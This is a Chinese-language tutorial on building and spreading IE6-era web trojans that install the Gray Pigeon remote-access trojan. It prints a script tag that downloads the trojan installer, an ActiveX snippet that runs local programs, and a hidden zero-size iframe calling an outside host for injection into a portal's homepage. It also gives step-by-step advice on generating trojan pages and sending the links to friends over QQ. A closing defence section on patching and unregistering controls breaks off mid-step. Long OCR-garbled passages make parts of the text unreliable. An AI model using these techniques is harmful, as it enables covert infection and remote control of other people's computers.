網(wǎng)頁木馬制作全過程(詳細)

網(wǎng)頁木馬制作全過程（詳細）如果你訪問XX網(wǎng)站（國內(nèi)某門戶網(wǎng)站），你就會中灰鴿子木馬。這是我一黑客朋友給我說的一句說。打開該網(wǎng)站的首頁，經(jīng)檢查，我確實中了灰鴿子。怎么實現(xiàn)的呢？他說，他侵入了該網(wǎng)站的服務(wù)器并在網(wǎng)站主頁上掛了網(wǎng)頁木馬；一些安全專家常說，不要打開陌生人發(fā)來的網(wǎng)址，為什么？因為該網(wǎng)址很有可能就是一些不懷好意者精心制作的網(wǎng)頁木馬。以上只是網(wǎng)頁木馬的兩種形式，實際上網(wǎng)頁木馬還可以掛在多媒體文件（RM、RMVB、WMV、WMA、Flash）、電子郵件、論壇等多種文件和場合上。很可怕吧，那么用戶如何防范網(wǎng)頁木馬呢？下面我們就先從網(wǎng)頁木馬的攻擊原理說起。一、網(wǎng)頁木馬的攻擊原理首先明確，網(wǎng)頁木馬實際上是一個HTML網(wǎng)頁，與其它網(wǎng)頁不同的是該網(wǎng)頁是黑客精心制作的，用戶一旦訪問了該網(wǎng)頁就會中木馬。為什么說是黑客精心制作的呢？因為嵌入在這個網(wǎng)頁中的腳本恰如其分地利用了IE瀏覽器的漏洞，讓IE在后臺自動下載黑客放置在網(wǎng)絡(luò)上的木馬并運行（安裝）這個木馬，也就是說，這個網(wǎng)頁能下載木馬到本地并運行（安裝）下載到本地電腦上的木馬，整個過程都在后臺運行，用戶一旦打開這個網(wǎng)頁，下載過程和運行（安裝）過程就自動開始。有朋友會說，打開一個網(wǎng)頁，IE瀏覽器真的能自動下載程序和運行程序嗎？如果IE真的能肆無忌憚地任意下載和運行程序，那天下還不大亂。實際上，為了安全,IE瀏覽器是禁止自動下載程序特別是運行程序的，但是，IE瀏覽器存在著一些已知和未知的漏洞，網(wǎng)頁木馬就是利用這些漏洞獲得權(quán)限來下載程序和運行程序的。下面我舉IE瀏覽器早期的一個漏洞來分別說明這兩個問題。1?自動下載程序〈SCRIPTLANGUAGE二"icyfoxlovelace"src="/l.exe"〉〈/SCRIPT〉小提示：代碼說明代碼中“src”的屬性為程序的網(wǎng)絡(luò)地址，本例中“/l.exe”為我放置在自己Web服務(wù)器上的灰鴿子服務(wù)端安裝程序，這段代碼能讓網(wǎng)頁下載該程序到瀏覽它的電腦上。也可以把木馬程序上傳到免費的主頁空間上去，但免費空間出于安全的考慮，多數(shù)不允許上傳exe文件，黑客可能變通一下把擴展名exe改為bat或com，這樣他們就可以把這些程序上傳到服務(wù)器上了。把這段代碼插入到網(wǎng)頁源代碼的〈/BODY〉???〈/BODY〉之間（如圖1）,然后用沒打補丁的IE6打開，接下來，打開IE的臨時目錄〈TemporaryInternetFiles〉，你會發(fā)現(xiàn)，在該文件夾中有一個“l(fā).exe”文件,這也就是說，該網(wǎng)頁已自動下載了我放置在Web服務(wù)器上的灰鴿子木馬。

燈門L笳燈門L笳呆町.哥■們</HEm<5CRll*TLRHGUfiGE-BricyFaxlou?Ldce“sr￡-BBhtt!(j：</gol63giOi_uicp.irE-t/ixexeBB></5GRIPT></DOD￥></HTHl?圖1網(wǎng)頁木馬示例小提示：灰鴿子木馬為什么一定要用灰鴿子木馬呢？因為灰鴿子是反彈型木馬，該木馬能繞過天網(wǎng)等大多數(shù)防火墻的攔截，中馬后，服務(wù)端即被控端能主動連接控制端(客戶端)，也就是說，一旦被控端連接到Internet,在控制端那里，被控端就會“自動上線”(如圖2)。最<1搜索內(nèi)容目動上線主機jj自動上線主.+文件Q設(shè)置⑥工具①、幫助⑩0搜索結(jié)果包噩配置服務(wù)程序當前連接：如N最<1搜索內(nèi)容目動上線主機jj自動上線主.+文件Q設(shè)置⑥工具①、幫助⑩0搜索結(jié)果包噩配置服務(wù)程序當前連接：如N12CI.4T.T2-上海爻 電胞名稱：VSN-226-03連接密碼：?文件目錄瀏覽文件管理器遠程控制命令?建冊表編輯器命令廣播已馬看一亙上網(wǎng)，I甲遲我的電腦J疼這亙瑩會自動上翌丿r啖E-5E3Qf+ 3D:+ ；E:+ 3F:+r■SwiHIiOWS.I^JProgr：=ifTiFileE.MyIlnr1JJTIent￡i>JMATLAERU二RAVBDTdedowrild.tmp^jMATLAESpl'jFROVIEW?Recycled囂線捕囂幕謹音卓圖2灰鴿子控制短示例(汗！又一大毒梟:))2.自動運行程序<SCRIPTLANGUAGE="javascript"type="text/javascript">varshell=newActiveXObject("shell.application");space("c:\\Windows\\").items().item("Notepad.exe").invokeverb();</SCRIPT>把這段代碼插入到網(wǎng)頁源代碼的〈/B0DY〉???〈/B0DY〉之間，然后用IE打開該網(wǎng)頁，你會發(fā)現(xiàn)，這段代碼可以在沒有打相關(guān)補丁的IE6中自動打開記事本。這段代碼使用了shell.application控件，該控件能使網(wǎng)頁獲得執(zhí)行權(quán)限，替換代碼中的“Notepad.exe”（記事本）程序，可以用它自動運行本地電腦上的任意程序。通過以上的代碼我們可以看出，利用IE的漏洞，也就是說在網(wǎng)頁中插入適當?shù)拇a，IE完全可以自動下載和運行程序，不過，IE一旦打了相關(guān)補丁，這些代碼就會失去作用。另外，這些代碼要運行和下載程序，有些殺毒軟件的網(wǎng)頁監(jiān)控會視它們?yōu)椴《荆瑸榱颂颖茏窔?，黑客可能會使用一些工具對網(wǎng)頁的源代碼進行加密處理（如圖3）。西禪頁嵐碼111瞪*f至』 iic.t<a3-pfl￡nterniet丈西禪頁嵐碼111瞪*f至』 iic.t<a3-pfl￡nterniet丈it悄 頑蜓⑥號看血專祗皿 tfWlQfi進娜|全選?:廉泡覽貢1屯.翌陽憐！色蚪■■!：.'理E.IT姐p-D'DCHO.ht*網(wǎng)頁代砒密瞬的丸旳隔心育： ?: 二■；：=-JL■看不WM4ff, JOAdacu>ent-卩耳日.text.val-u^K3EiE2rX-ySpSTKijSTSSXmr9%. 齊.卞udEESXuTBOLSuFFKXuBBFTlulAnbXu^[?34g也M釣加曲希亦?,_=十22ea^iltJC28?29?22*2ClDDM29*犯SdMXDASTDIfCl您0A4"廠二禎Ku8BF7NuBF93%u5165Kuffi90iu658T5C^EFt?ii4EE3*u?8BLK2?K._ mOMOAfunctiDrX20sanpi1^28X29^20/tfc2DTht%201t22C?pL<^^23*?D*/*0IK0Mt7BS0MDAdocu*siit.pad.teat.valurt3E?2T?2TS5BK0M0lcoi|>ilatiota3Dasc^rtZBcode^E^SBSOMOAdocwiieni:「pad.tsat.val-ueS3W22JKscript*3EK5CnJEJa?21—tSCEutoiMent?vritflt?Bune3capflW?K5C?22?22+cgwilalign^22*5ai2??29?29*JBKrcn//--*3Bt5GiSfi3CS5C/wEiptl?3EK22?HMQpsiui屮/BsOiMM.i亡刊晡羽訕辭旅誡丁旨課詬E仲諂2伽述環(huán)61訕國濮?尿黑燈荊訊測 L%22K29X3B?mOJJK7MOM-OAfiinEt工□用20￡41ecttDd&X28x29ftW^20S?lec-t伽譯20K22C口呻訂ati^22t2:Ofos^20Capyi^%2Di/1tOMS!OA^7MODaOAifS2edfleuHeftt. ttJit.沁hit.l&^gthK3EO?25^IWOASTB?QEttOAd0CUAerLt-p&d.tex^?i-3^uJI2??2?13^D!WOAcbeuKtrnoDaitsxt.aelect%233t29S3B%0Llt0AAlwfc?D49Aelf?* frrt/2；S：--:目暢彌*隹譯?國通回岀兇童].■]/?；-艾際炊嗽*ysff / -幽I「——二圖3加密后的網(wǎng)頁代碼二、網(wǎng)頁木馬的基本用法理解了網(wǎng)頁木馬攻擊的原理，我們可以制作自己的網(wǎng)頁木馬，但這需要你根據(jù)IE漏洞寫出利用代碼。實際上，在網(wǎng)上有很多高手已寫出了一些漏洞的利用代碼，有的還把它寫成了可視化的程序。在搜索引擎輸入“網(wǎng)頁木馬生成器”進行搜索，你會發(fā)現(xiàn)，在網(wǎng)上有很多利用IE的各種漏洞編寫的網(wǎng)頁木馬生成器，它們大都為可視化的程序，只要你有一個木馬（該木馬必須把它放置到網(wǎng)絡(luò)上），利用這些生成器你就可以立即生成一個網(wǎng)頁，該網(wǎng)頁就是網(wǎng)頁木馬，只要他人打開這個網(wǎng)頁，該網(wǎng)頁就可以自動完成下載木馬并運行（安裝）木馬的過程。在我的電腦上我已下載了一個網(wǎng)頁木馬生成器，下面我們來看怎么生成網(wǎng)頁木馬并讓他人中木馬。第一步：啟動該網(wǎng)頁木馬生成器，如圖4所示，在文本框中輸入木馬的網(wǎng)絡(luò)地址，最后單擊“生成”。圖4網(wǎng)頁木馬生成器第二步：在網(wǎng)頁木馬生成器的安裝文件夾會生成一個網(wǎng)頁文件，該文件就是我們在上一步生成的網(wǎng)頁木馬。上傳該文件到自己的Web服務(wù)器或免費主面空間?，F(xiàn)在好了，把上述網(wǎng)頁在服務(wù)器上的地址（網(wǎng)址）通過QQ發(fā)給自己的好友，一旦他訪問了該網(wǎng)頁，該網(wǎng)頁就會在他的電腦上自動下載并運行你放置在網(wǎng)絡(luò)上的木馬?，F(xiàn)在你該明白安全專家勸告的“不要打開陌生人發(fā)來的網(wǎng)絡(luò)地址”這句話的真諦了吧！實際上，即使人人都不打開陌生人發(fā)來的網(wǎng)址，也仍然有一些人“飛蛾補燈，自尋死路”，因為若大的Internet,總會有一些人會有意或無意地訪問這些網(wǎng)址，而且，有些網(wǎng)頁木馬，還掛在一些知名網(wǎng)站上（根據(jù)知名網(wǎng)站的訪問量，你算算吧，每天有多少人中了木馬?。Ｐ√崾荆耗憧赡苓€沒想到，看電影，在論壇查看或回復(fù)帖子也能中木馬。實際上，網(wǎng)頁木馬還可以掛在多媒體文件、電子郵件、論壇、CHM電子書上，這樣，用戶一旦觀看電影、查看或預(yù)覽郵件（主要是一些用電子郵件群發(fā)器發(fā)送的垃圾郵件）、參與帖子，打開電子書，用戶就會中網(wǎng)頁木馬。在下面我們只介紹黑客如何在知名網(wǎng)站上掛網(wǎng)頁木馬。下面來看這一段代碼：iframesrc="/hk.htm"width二"0"height二"0"frameborder二"0"〉〈/iframe〉小提示：“src”的屬性“http://gol63go.vicp.net/hk.htm”是上傳到服務(wù)器上的網(wǎng)頁木馬的網(wǎng)址。把這段代碼插入到某門戶網(wǎng)站首頁源代碼的〈/B0DY〉???〈/B0DY〉之間，從表面上看，插入后該門戶的首頁并沒有什么變化，但是，所有訪問了該門戶網(wǎng)站首頁的人都會中木馬，為什么會這樣呢？這是因為這段代碼中〈iframe〉標簽把網(wǎng)頁木馬網(wǎng)頁隱藏性地“包含”在了插入代碼的網(wǎng)頁當中?！磇frame〉也叫浮動幀標簽，它可以把一個HTML網(wǎng)頁嵌入到另一個網(wǎng)頁里實現(xiàn)“畫中畫”的效果（如圖5）,被嵌入的網(wǎng)頁可以控制寬、高以及邊框大小和是否出現(xiàn)滾動條等。在上代代碼中，因為把寬（width）、高（height）、邊框（frameborder）都設(shè)置為了“0”，所以，上述代碼插入到門戶網(wǎng)站的首頁后，網(wǎng)站的首頁不會發(fā)生變化，但是，由于嵌入的網(wǎng)頁實際上已經(jīng)打開了，所以網(wǎng)頁上的下載木馬和運行木馬的腳本還是會隨著門戶首頁的打開而執(zhí)行的。圖5iframe標簽示例也許有人會問，如何把上述代碼插入到門戶網(wǎng)站首頁的源代碼中？這個問題問得好，本人才疏學(xué)淺，確實無法進入他們的服務(wù)器修改網(wǎng)頁，但是黑客如果發(fā)現(xiàn)了這些服務(wù)器上的漏洞且獲得了webshell權(quán)限，那么修改他們的網(wǎng)頁就跟在本地制作一個網(wǎng)頁一樣容易。有人還問，拿到服務(wù)器的webshell權(quán)限容易嗎？如果你對網(wǎng)絡(luò)安全比較關(guān)注，你會發(fā)現(xiàn)，經(jīng)常有這個網(wǎng)站被黑了，那個網(wǎng)站的主頁被修改了的新聞爆出。有人還問，門戶的服務(wù)器幾乎無漏洞可找，個人服務(wù)器的漏洞較多，你能進入嗎？本人不是黑客，中華人民共和國的法律規(guī)定，入侵和篡改他人服務(wù)器上的信息是違法行為，希望大家共同維護網(wǎng)絡(luò)安全。以前，在網(wǎng)上打開一些有名的網(wǎng)站時殺毒軟件也會報警，現(xiàn)在你明白其中的道理了吧。有些人在這些網(wǎng)站發(fā)帖子罵娘，看了本文，希望在罵娘時你也能為那些墊背的站長想想。三：網(wǎng)頁木馬的防范策略網(wǎng)頁木馬的防范只靠殺毒軟件和防火墻是遠遠不夠的，因為一旦黑客使用了反彈端口的個人版木馬（個人反匯編的一些殺毒軟件無法識別的木馬），那么殺毒軟件和防火墻就無可奈何，所以，網(wǎng)頁木馬的防范要從它的原理入手，從根子上進行防范。㈠即時安裝安全補丁網(wǎng)頁木馬都是利用IE漏洞進行傳播的，我們拿冰狐浪子的網(wǎng)頁木馬（用“冰狐浪子網(wǎng)頁木馬生成器”制作的網(wǎng)頁木馬）來說吧，該網(wǎng)頁能繞過IE的安全設(shè)置，當用戶連接到該網(wǎng)頁時，它能在普通用戶不知情的情況下在后臺下載一個木馬并運行（安裝）該木馬。所以，經(jīng)常到微軟網(wǎng)站去下載并安裝最新的安全補丁是防范網(wǎng)頁木馬比較有效的辦法。㈡改名或卸載（反注冊）最不安全的ActiveXObject（IE插件）在系統(tǒng)中有些ActiveXObject會運行EXE程序，比如本文中“自動運行程序”代碼中的Shell.application控件，這些控件一旦在網(wǎng)頁中獲得了執(zhí)行權(quán)限，那么它就會變?yōu)槟抉R運行的“溫床”，所以把這些控件改名或卸載能徹底防范利用這些控件的網(wǎng)頁木馬。但是ActiveXObject是為了應(yīng)用而出現(xiàn)的，而不是為了攻擊而出現(xiàn)的，所有的控件都有它的用處，所以在改名或卸載一個控件之前，你必須確認這個控件是你不需要的，或者即使卸載了也不關(guān)大體的。1.卸載（反注冊）ActiveXObject第一步：在“開始”菜單上單擊“運行”，輸入“CMD”命令打開命令提示符窗口。第二步：在命令提示符下輸入“regsvr32.exeshell32.dll/u/s”，然后回車就能將Shell.application控件卸載。如果日后我們希望繼續(xù)使用這個控件的話，可以在命令提示符窗口中輸入“regsvr32.exeshell32.dll/i/s”命令將它們重新安裝（注冊）。在上述命令中：“regsvr32.exe”是注冊或反注冊O(shè)LE對象或控件的命令，［/u］是反注冊參數(shù)，［/s］是寂靜模式參數(shù)，［/I］為安裝參數(shù)。2.改名ActiveXObject需要說明的是，改名一個控件時，控件的名稱和CLSID（ClassID）都要改，并且要改徹底了。下面仍以Shell.application為例來介紹方法。第一步